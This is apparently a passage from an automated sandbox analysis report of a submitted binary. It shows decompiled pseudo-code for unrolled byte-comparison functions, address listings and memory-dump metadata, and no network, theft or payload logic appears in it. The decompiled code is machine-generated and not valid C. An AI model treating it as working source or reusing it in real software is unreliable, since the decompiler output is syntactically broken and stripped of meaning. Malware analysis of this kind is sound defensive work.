													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
												}
												goto L70;
											}
											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t328 == 0) {
									L52:
									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t330 == 0) {
										L54:
										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t332 == 0) {
											L56:
											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t309 != 0) {
												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
											}
											goto L59;
										}
										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t335 == 0) {
								L41:
								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t337 == 0) {
									L43:
									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t339 == 0) {
										L45:
										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t309 != 0) {
											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
										}
										goto L48;
									}
									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t342 == 0) {
							L30:
							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t344 == 0) {
								L32:
								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t346 == 0) {
									L34:
									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t309 != 0) {
										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
									}
									goto L37;
								}
								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t349 == 0) {
						L19:
						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t351 == 0) {
							L21:
							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t353 == 0) {
								L23:
								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t309 != 0) {
									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								}
								goto L26;
							}
							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
					if(_t309 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L15;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L12;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L10;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t309;
				goto L3;
			}

0x0040a13d
0x0040a13d
0x0040a143
0x0040a1c2
0x0040a1c4
0x0040a1c6
0x00000000
0x00000000
0x0040a1cc
0x0040a1d2
0x0040a251
0x0040a253
0x0040a255
0x00000000
0x00000000
0x0040a25b
0x0040a261
0x0040a2e0
0x0040a2e2
0x0040a2e4
0x00000000
0x00000000
0x0040a2ea
0x0040a2f0
0x0040a36f
0x0040a371
0x0040a373
0x00000000
0x00000000
0x0040a379
0x0040a37f
0x0040a3fe
0x0040a400
0x0040a402
0x00000000
0x00000000
0x0040a40e
0x0040a48e
0x0040a490
0x0040a492
0x00000000
0x00000000
0x0040a498
0x0040a49e
0x0040a51d
0x0040a51f
0x0040a521
0x00000000
0x00000000
0x0040a52f
0x00409d29
0x00409d2b
0x0040aa87
0x0040aa87
0x0040a53d
0x0040a53f
0x0040a11b
0x0040a123
0x0040a125
0x0040a136
0x0040a136
0x00000000
0x0040a125
0x0040a54c
0x0040a552
0x0040a96b
0x00000000
0x0040a96b
0x00000000
0x0040a558
0x0040a4a7
0x0040a4a9
0x0040a4c0
0x0040a4c8
0x0040a4ca
0x0040a4e1
0x0040a4e9
0x0040a4eb
0x0040a502
0x0040a50a
0x0040a50c
0x0040a519
0x0040a519
0x00000000
0x0040a50c
0x0040a4f8
0x0040a4fc
0x00000000
0x00000000
0x00000000
0x0040a4fc
0x0040a4d7
0x0040a4db
0x00000000
0x00000000
0x00000000
0x0040a4db
0x0040a4b6
0x0040a4ba
0x00000000
0x00000000
0x00000000
0x0040a4ba
0x0040a418
0x0040a41a
0x0040a431
0x0040a439
0x0040a43b
0x0040a452
0x0040a45a
0x0040a45c
0x0040a473
0x0040a47b
0x0040a47d
0x0040a48a
0x0040a48a
0x00000000
0x0040a47d
0x0040a469
0x0040a46d
0x00000000
0x00000000
0x00000000
0x0040a46d
0x0040a448
0x0040a44c
0x00000000
0x00000000
0x00000000
0x0040a44c
0x0040a427
0x0040a42b
0x00000000
0x00000000
0x00000000
0x0040a42b
0x0040a388
0x0040a38a
0x0040a3a1
0x0040a3a9
0x0040a3ab
0x0040a3c2
0x0040a3ca
0x0040a3cc
0x0040a3e3
0x0040a3eb
0x0040a3ed
0x0040a3fa
0x0040a3fa
0x00000000
0x0040a3ed
0x0040a3d9
0x0040a3dd
0x00000000
0x00000000
0x00000000
0x0040a3dd
0x0040a3b8
0x0040a3bc
0x00000000
0x00000000
0x00000000
0x0040a3bc
0x0040a397
0x0040a39b
0x00000000
0x00000000
0x00000000
0x0040a39b
0x0040a2f9
0x0040a2fb
0x0040a312
0x0040a31a
0x0040a31c
0x0040a333
0x0040a33b
0x0040a33d
0x0040a354
0x0040a35c
0x0040a35e
0x0040a36b
0x0040a36b
0x00000000
0x0040a35e
0x0040a34a
0x0040a34e
0x00000000
0x00000000
0x00000000
0x0040a34e
0x0040a329
0x0040a32d
0x00000000
0x00000000
0x00000000
0x0040a32d
0x0040a308
0x0040a30c
0x00000000
0x00000000
0x00000000
0x0040a30c
0x0040a26a
0x0040a26c
0x0040a283
0x0040a28b
0x0040a28d
0x0040a2a4
0x0040a2ac
0x0040a2ae
0x0040a2c5
0x0040a2cd
0x0040a2cf
0x0040a2dc
0x0040a2dc
0x00000000
0x0040a2cf
0x0040a2bb
0x0040a2bf
0x00000000
0x00000000
0x00000000
0x0040a2bf
0x0040a29a
0x0040a29e
0x00000000
0x00000000
0x00000000
0x0040a29e
0x0040a279
0x0040a27d
0x00000000
0x00000000
0x00000000
0x0040a27d
0x0040a1db
0x0040a1dd
0x0040a1f4
0x0040a1fc
0x0040a1fe
0x0040a215
0x0040a21d
0x0040a21f
0x0040a236
0x0040a23e
0x0040a240
0x0040a24d
0x0040a24d
0x00000000
0x0040a240
0x0040a22c
0x0040a230
0x00000000
0x00000000
0x00000000
0x0040a230
0x0040a20b
0x0040a20f
0x00000000
0x00000000
0x00000000
0x0040a20f
0x0040a1ea
0x0040a1ee
0x00000000
0x00000000
0x00000000
0x0040a145
0x0040a145
0x0040a148
0x0040a14c
0x0040a14e
0x0040a165
0x0040a165
0x0040a169
0x0040a16d
0x0040a16f
0x0040a186
0x0040a186
0x0040a18a
0x0040a18e
0x0040a190
0x0040a1a7
0x0040a1a7
0x0040a1ab
0x0040a1af
0x0040a1b1
0x0040a1b7
0x0040a1ba
0x0040a1be
0x0040a1be
0x00000000
0x0040a1b1
0x0040a196
0x0040a199
0x0040a19d
0x0040a1a1
0x00000000
0x00000000
0x00000000
0x0040a1a1
0x0040a175
0x0040a178
0x0040a17c
0x0040a180
0x00000000
0x00000000
0x00000000
0x0040a180
0x0040a154
0x0040a157
0x0040a15b
0x0040a15f
0x00000000
0x00000000
0x00000000
0x0040a15f
0x00409956
0x00409956
0x00000000

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: eed2c2445293c7a99405421ad9004bed363ca3d02742e11cc68ea383fe50e894
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: 70D14C73C0AAB30AC775812E416852BEE626FD165031EC3B69CE83F3CED13A5D1596D4

Uniqueness

Uniqueness Score: -1.00%

Function 00409D31 Relevance: .4, Instructions: 361
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00409D31(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t296;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t334;
				void* _t336;
				void* _t338;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t296 = 0;
					L12:
					if(_t296 != 0) {
						goto L1;
					}
					_t193 =  *(_t183 - 0x19);
					if(_t193 ==  *(_t187 - 0x19)) {
						_t296 = 0;
						L23:
						if(_t296 != 0) {
							goto L1;
						}
						_t194 =  *(_t183 - 0x15);
						if(_t194 ==  *(_t187 - 0x15)) {
							_t296 = 0;
							L34:
							if(_t296 != 0) {
								goto L1;
							}
							_t195 =  *(_t183 - 0x11);
							if(_t195 ==  *(_t187 - 0x11)) {
								_t296 = 0;
								L45:
								if(_t296 != 0) {
									goto L1;
								}
								_t196 =  *(_t183 - 0xd);
								if(_t196 ==  *(_t187 - 0xd)) {
									_t296 = 0;
									L56:
									if(_t296 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t296 = 0;
										L67:
										if(_t296 != 0) {
											goto L1;
										}
										_t198 =  *(_t183 - 5);
										if(_t198 ==  *(_t187 - 5)) {
											_t296 = 0;
											L78:
											if(_t296 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
											}
											L2:
											return _t184;
										}
										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t299 == 0) {
											L71:
											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t301 == 0) {
												L73:
												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t303 == 0) {
													L75:
													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t296 != 0) {
														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
												if(_t296 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L73;
										}
										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t306 == 0) {
										L60:
										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t308 == 0) {
											L62:
											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t310 == 0) {
												L64:
												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t296 != 0) {
													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												}
												goto L67;
											}
											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t313 == 0) {
									L49:
									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t315 == 0) {
										L51:
										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t317 == 0) {
											L53:
											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t296 != 0) {
												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
											}
											goto L56;
										}
										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t320 == 0) {
								L38:
								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t322 == 0) {
									L40:
									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t324 == 0) {
										L42:
										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t296 != 0) {
											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
										}
										goto L45;
									}
									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t327 == 0) {
							L27:
							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t329 == 0) {
								L29:
								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t331 == 0) {
									L31:
									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t296 != 0) {
										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
									}
									goto L34;
								}
								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t334 == 0) {
						L16:
						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t336 == 0) {
							L18:
							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t338 == 0) {
								L20:
								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t296 != 0) {
									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
								}
								goto L23;
							}
							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
					if(_t296 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L12;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L9;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L7;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t296;
				goto L2;
			}

0x00409d31
0x00409d31
0x00409d37
0x00409db6
0x00409db8
0x00409dba
0x00000000
0x00000000
0x00409dc0
0x00409dc6
0x00409e45
0x00409e47
0x00409e49
0x00000000
0x00000000
0x00409e4f
0x00409e55
0x00409ed4
0x00409ed6
0x00409ed8
0x00000000
0x00000000
0x00409ede
0x00409ee4
0x00409f63
0x00409f65
0x00409f67
0x00000000
0x00000000
0x00409f6d
0x00409f73
0x00409ff2
0x00409ff4
0x00409ff6
0x00000000
0x00000000
0x0040a002
0x0040a082
0x0040a084
0x0040a086
0x00000000
0x00000000
0x0040a08c
0x0040a092
0x0040a111
0x0040a113
0x0040a115
0x00000000
0x00000000
0x0040a123
0x0040a125
0x0040a136
0x0040a136
0x00409d2b
0x0040aa87
0x0040aa87
0x0040a09b
0x0040a09d
0x0040a0b4
0x0040a0bc
0x0040a0be
0x0040a0d5
0x0040a0dd
0x0040a0df
0x0040a0f6
0x0040a0fe
0x0040a100
0x0040a10d
0x0040a10d
0x00000000
0x0040a100
0x0040a0ec
0x0040a0f0
0x00000000
0x00000000
0x00000000
0x0040a0f0
0x0040a0cb
0x0040a0cf
0x00000000
0x00000000
0x00000000
0x0040a0cf
0x0040a0aa
0x0040a0ae
0x00000000
0x00000000
0x00000000
0x0040a0ae
0x0040a00c
0x0040a00e
0x0040a025
0x0040a02d
0x0040a02f
0x0040a046
0x0040a04e
0x0040a050
0x0040a067
0x0040a06f
0x0040a071
0x0040a07e
0x0040a07e
0x00000000
0x0040a071
0x0040a05d
0x0040a061
0x00000000
0x00000000
0x00000000
0x0040a061
0x0040a03c
0x0040a040
0x00000000
0x00000000
0x00000000
0x0040a040
0x0040a01b
0x0040a01f
0x00000000
0x00000000
0x00000000
0x0040a01f
0x00409f7c
0x00409f7e
0x00409f95
0x00409f9d
0x00409f9f
0x00409fb6
0x00409fbe
0x00409fc0
0x00409fd7
0x00409fdf
0x00409fe1
0x00409fee
0x00409fee
0x00000000
0x00409fe1
0x00409fcd
0x00409fd1
0x00000000
0x00000000
0x00000000
0x00409fd1
0x00409fac
0x00409fb0
0x00000000
0x00000000
0x00000000
0x00409fb0
0x00409f8b
0x00409f8f
0x00000000
0x00000000
0x00000000
0x00409f8f
0x00409eed
0x00409eef
0x00409f06
0x00409f0e
0x00409f10
0x00409f27
0x00409f2f
0x00409f31
0x00409f48
0x00409f50
0x00409f52
0x00409f5f
0x00409f5f
0x00000000
0x00409f52
0x00409f3e
0x00409f42
0x00000000
0x00000000
0x00000000
0x00409f42
0x00409f1d
0x00409f21
0x00000000
0x00000000
0x00000000
0x00409f21
0x00409efc
0x00409f00
0x00000000
0x00000000
0x00000000
0x00409f00
0x00409e5e
0x00409e60
0x00409e77
0x00409e7f
0x00409e81
0x00409e98
0x00409ea0
0x00409ea2
0x00409eb9
0x00409ec1
0x00409ec3
0x00409ed0
0x00409ed0
0x00000000
0x00409ec3
0x00409eaf
0x00409eb3
0x00000000
0x00000000
0x00000000
0x00409eb3
0x00409e8e
0x00409e92
0x00000000
0x00000000
0x00000000
0x00409e92
0x00409e6d
0x00409e71
0x00000000
0x00000000
0x00000000
0x00409e71
0x00409dcf
0x00409dd1
0x00409de8
0x00409df0
0x00409df2
0x00409e09
0x00409e11
0x00409e13
0x00409e2a
0x00409e32
0x00409e34
0x00409e41
0x00409e41
0x00000000
0x00409e34
0x00409e20
0x00409e24
0x00000000
0x00000000
0x00000000
0x00409e24
0x00409dff
0x00409e03
0x00000000
0x00000000
0x00000000
0x00409e03
0x00409dde
0x00409de2
0x00000000
0x00000000
0x00000000
0x00409d39
0x00409d39
0x00409d3c
0x00409d40
0x00409d42
0x00409d59
0x00409d59
0x00409d5d
0x00409d61
0x00409d63
0x00409d7a
0x00409d7a
0x00409d7e
0x00409d82
0x00409d84
0x00409d9b
0x00409d9b
0x00409d9f
0x00409da3
0x00409da5
0x00409dab
0x00409dae
0x00409db2
0x00409db2
0x00000000
0x00409da5
0x00409d8a
0x00409d8d
0x00409d91
0x00409d95
0x00000000
0x00000000
0x00000000
0x00409d95
0x00409d69
0x00409d6c
0x00409d70
0x00409d74
0x00000000
0x00000000
0x00000000
0x00409d74
0x00409d48
0x00409d4b
0x00409d4f
0x00409d53
0x00000000
0x00000000
0x00000000
0x00409d53
0x00409956
0x00409956
0x00000000

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: 12bcb928ef3716198229e41e739d7332ddb1b7be619051afbbdd4da04a10a3f0
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: 5FC15EB3C0A9B30AC775812E416812BEE626FD165031EC3B69CE83F3CED63A5D1596D4

Uniqueness

Uniqueness Score: -1.00%

Function 0040995D Relevance: .4, Instructions: 351
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040995D(void* __eax, void* __ecx) {
				void* _t177;
				signed int _t178;
				void* _t181;
				signed char _t187;
				signed char _t188;
				signed char _t189;
				signed char _t191;
				signed char _t192;
				signed int _t198;
				signed int _t284;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;

				_t181 = __ecx;
				_t177 = __eax;
				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
					_t284 = 0;
					L11:
					if(_t284 != 0) {
						goto L1;
					}
					_t187 =  *(_t177 - 0x18);
					if(_t187 ==  *(_t181 - 0x18)) {
						_t284 = 0;
						L22:
						if(_t284 != 0) {
							goto L1;
						}
